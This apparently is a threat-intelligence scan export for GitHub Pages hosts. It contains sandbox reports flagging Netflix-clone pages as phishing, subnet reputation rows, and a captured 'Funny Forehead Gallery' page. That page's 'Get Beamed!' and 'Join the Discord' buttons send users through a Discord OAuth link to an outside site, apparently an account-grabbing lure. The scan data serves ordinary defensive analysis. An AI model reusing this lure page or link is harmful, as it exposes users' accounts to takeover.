| 2023-05-12 02:51:04 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://rehmatullah86.github.io/netflix_clone/', u'type': u'submitted', u'verdict': u'suspicious'}, {u'url': u'http://rehmatullah86.github.io/netflix_clone', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'http://rehmatullah86.github.io/netflix_clone/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_d10_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_d10_IESQMMUTEX_0_519"\n "Local\\VERMGMTBlockListFileMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_d10_IESQMMUTEX_0_331"\n "IsoScope_d10_ConnHashTable<3344>_HashTable_Mutex"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_d10_IESQMMUTEX_0_303"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3344"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_d10_IE_EarlyTabStart_0xa3c_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': 
u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.108.153:80"\n "185.199.108.153:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"rehmatullah86.github.io"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"rehmatullah86.github.io"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"1_2_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3" and extension "jpg"\n "2_1_.jpg" has type "JPEG image data Exif standard: [TIFF image data big-endian direntries=12 height=638 bps=0 PhotometricIntepretation=RGB orientation=upper-left width=851] baseline precision 8 
640x480 components 3" and extension "jpg"\n "4_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced" and extension "png"\n "3_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 640x480 components 3" and extension "jpg"\n "tv_1_.png" has type "PNG image data 640 x 480 8-bit colormap non-interlaced" and extension "png"\n "logo_1_.png" has type "PNG image data 329 x 88 8-bit/color RGBA non-interlaced" and extension "png"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "1_2_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3"- [targetUID: N/A]\n "2_1_.jpg" has type "JPEG image data Exif standard: [TIFF image data big-endian direntries=12 height=638 bps=0 PhotometricIntepretation=RGB orientation=upper-left width=851] baseline precision 8 640x480 components 3"- [targetUID: N/A]\n "4_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "3_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 640x480 components 3"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003344]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF44244AA0D7A8F1A8.TMP" has type "data"- Location: [%TEMP%\\~DF44244AA0D7A8F1A8.TMP]- [targetUID: 00000000-00003344]\n 
"~DF6B5AD45135BC9286.TMP" has type "data"- Location: [%TEMP%\\~DF6B5AD45135BC9286.TMP]- [targetUID: 00000000-00003344]\n "~DF53F25271FCD48569.TMP" has type "data"- Location: [%TEMP%\\~DF53F25271FCD48569.TMP]- [targetUID: 00000000-00003344]\n "~DF67619BE54EA421A3.TMP" has type "data"- Location: [%TEMP%\\~DF67619BE54EA421A3.TMP]- [targetUID: 00000000-00003344]\n "tv_1_.png" has type "PNG image data 640 x 480 8-bit colormap non-interlaced"- [targetUID: N/A]\n "logo_1_.png" has type "PNG image data 329 x 88 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "RecoveryStore._5DE8AAB1-EF98-11ED-949B-0800270A776F_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "style_1_.css" has type "ASCII text"- [targetUID: N/A]\n "_5DE8AAB3-EF98-11ED-949B-0800270A776F_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_65F9F98F-EF98-11ED-949B-0800270A776F_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "urlref_httprehmatullah86.github.ionetflix_clone" has type "HTML document UTF-8 Unicode text"- [targetUID: N/A]\n "favicon_3_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "QPQVPPEG.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\QPQVPPEG.txt]- [targetUID: 00000000-00001340]\n "COJ230SP.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\COJ230SP.txt]- [targetUID: 00000000-00003344]\n "RI2WUD6Q.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\RI2WUD6Q.txt]- [targetUID: 00000000-00003344]\n "search_1_.json" has type "JSON data"- [targetUID: N/A]\n "netflix_clone_1_.htm" has type "HTML document ASCII text with CRLF line terminators"- [targetUID: N/A]\n "ZFBJLHCG.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\ZFBJLHCG.txt]- [targetUID: 00000000-00001340]\n "4E2LE2BZ.txt" has type 
"ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\4E2LE2BZ.txt]- [targetUID: 00000000-00003344]\n "1CLL0762.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\1CLL0762.txt]- [targetUID: 00000000-00003344]\n "P6EAY24L.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\P6EAY24L.txt]- [targetUID: 00000000-00003344]\n "netflix_clone_2_.htm" has type "HTML document UTF-8 Unicode text"- [targetUID: N/A]\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-62', u'name': u'Communicates with HTTP webserver (GET/POST requests)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'Found http requests in header "GET /netflix_clone/"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://rehmatullah86.github.io/netflix_clone/"\n Pattern match: "http://rehmatullah86.github.io"\n Pattern match: "http://rehmatullah86.github.io/netflix_clone"\n Pattern match: "OqC.jAG/4W^Ah\'AtW5"\n Pattern match: "ns.adobe.com/xap/1.0/"\n Pattern match: 
"SUIDmicrosoft.com/9216272184358431032346201961026331032229MUID17351C7AD92F609239520F74D8636172microsoft.com/1025285433280031110700201978604431032229_EDGE_Vmicrosoft.com/9216285433280031110700202016690431032229SRCHDAF=NOFORMmicrosoft.com/1024332378944031085"\n Pattern match: "SUIDmicrosoft.com/9216272184358431032346201961026331032229MUID17351C7AD92F609239520F74D8636172microsoft.com/1025285433280031110700201978604431032229SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743SRCHUIDV=2&GUID=426377958C8445E3B4EA69482"\n Pattern match: "SUIDmicrosoft.com/921 | 185.199.108.153 |
| 2023-05-12 02:46:40 | Physical Location | No | Fraudguard | 0 | 0 | 2 | 0 | None | United States, California, San Francisco | 185.199.109.153 |
| 2023-05-12 03:19:17 | Web Framework | No | Web Framework Identifier | 0 | 0 | 3 | 0 | None | jQuery | <!DOCTYPE html>
<html>
<head>
<title>Funny Forehead Gallery</title>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
<script src="http://code.jquery.com/jquery-3.2.1.js" integrity="sha256-DZAnKJ/6XZ9si04Hgrsxu/8s717jcIzLy3oi35EouyE=" crossorigin="anonymous"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>
<script src="https://use.fontawesome.com/9dfc16ed6b.js"></script>
<link rel="stylesheet" type="text/css" href="gallery.css">
<link rel="icon" type="image/png" href="/images/favicon.png">
</head>
<body>
<nav class = "nav navbar-inverse navbar-fixed-top">
<div class = "container">
<div class = "navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1" aria-expanded="false">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a href = "#" class = "navbar-brand"><span class="glyphicon glyphicon-picture" aria-hidden="true"></span> #WieselOnTop</a>
</div>
</nav>
<div class = "container">
<div class = "jumbotron">
<h1><i class="fa fa-camera-retro" aria-hidden="true"></i> The Funny Forehead Gallery</h1>
<p>A bunch of beautiful images!</p>
<a href = "https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https%3A%2F%2Fyoink.site%2Fauth&response_type=code&scope=identify%20guilds.join" class = "btn btn-primary btn-lg">Join the Discord</a>
<a href = "https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https%3A%2F%2Fyoink.site%2Fauth&response_type=code&scope=identify%20guilds.join" class = "btn btn-primary btn-lg">Get Beamed!</a>
</div>
<div class = "row">
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_1.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_2.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_3.JPG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/nomnom.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/fredo.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/jonas.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_1.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_2.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_3.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/ein_1.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/ein_2.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/reveloder.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/kappi_1.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/kappi_2.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_1.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_2.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_3.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_4.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_5.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_1.jpeg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_2.jpeg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_3.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_4.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_5.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_6.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/jcqn.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/nwp.PNG">
</div>
</div>
</div>
</body>
</html>
|
| 2023-05-12 03:01:44 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.229): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:50:56 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'https://kuldeepsuthar007.github.io/netflixclone', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'http://kuldeepsuthar007.github.io/netflixclone', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'http://kuldeepsuthar007.github.io/netflixclone/', u'type': u'submitted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'http://kuldeepsuthar007.github.io/netflixclone/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_c44_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_c44_IESQMMUTEX_0_519"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "UpdatingNewTabPageData"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_c44_IESQMMUTEX_0_331"\n "IsoScope_c44_IESQMMUTEX_0_303"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_c44_IE_EarlyTabStart_0xdb4_Mutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_c44_ConnHashTable<3140>_HashTable_Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\ZonesCacheCounterMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3140"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_c44_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_c44_IESQMMUTEX_0_331"'}, {u'category': u'General', u'origin': 
u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.108.153:80"\n "185.199.108.153:443"\n "45.57.90.1:443"\n "162.55.233.23:443"\n "142.250.191.42:443"\n "104.18.23.52:443"\n "203.192.208.115:443"\n "142.250.191.67:443"\n "172.67.75.130:80"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"kuldeepsuthar007.github.io"\n "pngimg.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"assets.nflxext.com"\n "fonts.googleapis.com"\n "fonts.gstatic.com"\n "kuldeepsuthar007.github.io"\n "occ-0-4023-2164.1.nflxso.net"\n "pngimg.com"\n "pro.fontawesome.com"\n "www.freepnglogos.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string "netflix.com from your personal computer or on any" (Indicator: "dir "; File: "urlref_httpkuldeepsuthar007.github.ionetflixclone")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': 
None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"AAAABVxdX2WnFSp49eXb1do0euaj-F8upNImjofE77XStKhf5kUHG94DPlTiGYqPeYNtiox-82NWEK0Ls3CnLe3WWClGdiJP_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced" and extension "png"\n "device-pile-in_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced" and extension "png"\n "IN-en-20210719-popsignuptwoweeks-perspective_alpha_website_small_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3" and extension "jpg"\n "mobile-0819_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 640x480 components 3" and extension "jpg"\n "netflix-logo-0_1_.png" has type "PNG image data 2208 x 684 8-bit/color RGBA non-interlaced" and extension "png"\n "download-icon_1_.gif" has type "GIF image data version 89a 100 x 100" and extension "gif"\n "boxshot_1_.png" has type "PNG image data 150 x 210 8-bit colormap non-interlaced" and extension "png"\n "tv_1_.png" has type "PNG image data 640 x 480 8-bit colormap non-interlaced" and extension "png"\n "netflix_PNG15_1_.png" has type "PNG image data 110 x 200 8-bit/color RGBA non-interlaced" and extension "png"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': 
u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "fa-light-300_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Pro Light family"- [targetUID: N/A]\n "fa-regular-400_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Pro Regular family"- [targetUID: N/A]\n "fa-solid-900_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Pro Solid family"- [targetUID: N/A]\n "AAAABVxdX2WnFSp49eXb1do0euaj-F8upNImjofE77XStKhf5kUHG94DPlTiGYqPeYNtiox-82NWEK0Ls3CnLe3WWClGdiJP_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "all_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "device-pile-in_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "IN-en-20210719-popsignuptwoweeks-perspective_alpha_website_small_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3"- [targetUID: N/A]\n "pxiDyp8kv8JHgFVrJJLm21llEw_1_.woff" has type "Web Open Font Format TrueType length 76672 version 1.1"- [targetUID: N/A]\n "pxiGyp8kv8JHgFVrJJLedA_1_.woff" has type "Web Open Font Format TrueType length 76604 version 1.1"- [targetUID: N/A]\n "pxiDyp8kv8JHgFVrJJLmv1plEw_1_.woff" has type "Web Open Font Format TrueType length 76404 version 1.1"- [targetUID: N/A]\n "pxiDyp8kv8JHgFVrJJLmr19lEw_1_.woff" has type "Web Open Font Format TrueType length 76076 version 1.1"- [targetUID: N/A]\n "pxiDyp8kv8JHgFVrJJLmy15lEw_1_.woff" has type "Web Open Font Format TrueType length 75364 version 1.1"- [targetUID: N/A]\n "pxiDyp8kv8JHgFVrJJLmg1hlEw_1_.woff" has type "Web Open Font Format TrueType length 75268 version 1.1"- [targetUID: N/A]\n "pxiDyp8kv8JHgFVrJJLm111lEw_1_.woff" has type "Web Open Font Format 
TrueType length 74932 version 1.1"- [targetUID: N/A]\n "pxiAyp8kv8JHgFVrJJLmE3tG_1_.woff" has type "Web Open Font Format TrueType length 72432 version 1.1"- [targetUID: N/A]\n "pxiDyp8kv8JHgFVrJJLm81xlEw_1_.woff" has type "Web Open Font Format TrueType length 71652 version 1.1"- [targetUID: N/A]\n "pxiEyp8kv8JHgFVrFJM_1_.woff" has type "Web Open Font Format TrueType length 66572 version 1.1"- [targetUID: N/A]\n "pxiByp8kv8JHgFVrLDz8V1g_1_.woff" has type "Web Open Font Format TrueType length 66448 version 1.1"- [targetUID: N/A]\n "pxiByp8kv8JHgFVrLFj_V1g_1_.woff" has type "Web Open Font Format TrueType length 66376 version 1.1"- [targetUID: N/A]\n "pxiByp8kv8JHgFVrLEj6V1g_1_.woff" has type "Web Open Font Format TrueType length 66232 version 1.1"- [targetUID: N/A]\n "pxiByp8kv8JHgFVrLGT9V1g_1_.woff" has type "Web Open Font Format TrueType length 65760 version 1.1"- [targetUID: N/A]\n "pxiByp8kv8JHgFVrLCz7V1g_1_.woff" has type "Web Open Font Format TrueType length 65616 version 1.1"- [targetUID: N/A]\n "pxiByp8kv8JHgFVrLDD4V1g_1_.woff" has type "Web Open Font Format TrueType length 65344 version 1.1"- [targetUID: N/A]\n "pxiByp8kv8JHgFVrLBT5V1g_1_.woff" has type "Web Open Font Format TrueType length 63856 version 1.1"- [targetUID: N/A]\n "pxiGyp8kv8JHgFVrLPTedA_1_.woff" has type "Web Open Font Format TrueType length 62300 version 1.1"- [targetUID: N/A]\n "mobile-0819_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 640x480 components 3"- [targetUID: N/A]\n "netflix-logo-0_1_.png" has type "PNG image data 2208 x 684 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "download-icon_1_.gif" has type "GIF image data version 89a 100 x 100"- [targetUID: N/A]\n "imagestore.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\imagestore\\3mt7jhv\\imagestore.dat]- [targetUID: 00000000-00003140]\n "boxshot_1_.png" has type "PNG image data 150 x 210 8-bit colormap non-interlaced"- 
[targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003140]\n "~DFB2644CCC9D5F3046.TMP" has type "data"- Location: [%TEMP%\\~DFB2644CCC9D5F3046.TMP]- [targetUID: 00000000-00003140]\n "~DF5184AB3A29D52D81.TMP" has type "data"- Location: [%TEMP%\\~DF5184AB | 185.199.108.153 |
| 2023-05-12 03:01:42 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.212): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:00:53 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 00089.github.io | 185.199.111.153 |
| 2023-05-12 02:52:26 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://mudit-sharma-02.github.io/Netflix-page1-clone/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_db4_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_db4_IESQMMUTEX_0_303"\n "IsoScope_db4_IESQMMUTEX_0_331"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_db4_ConnHashTable<3508>_HashTable_Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_db4_IESQMMUTEX_0_519"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3508"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "UpdatingNewTabPageData"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_db4_IE_EarlyTabStart_0xca4_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3508"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, 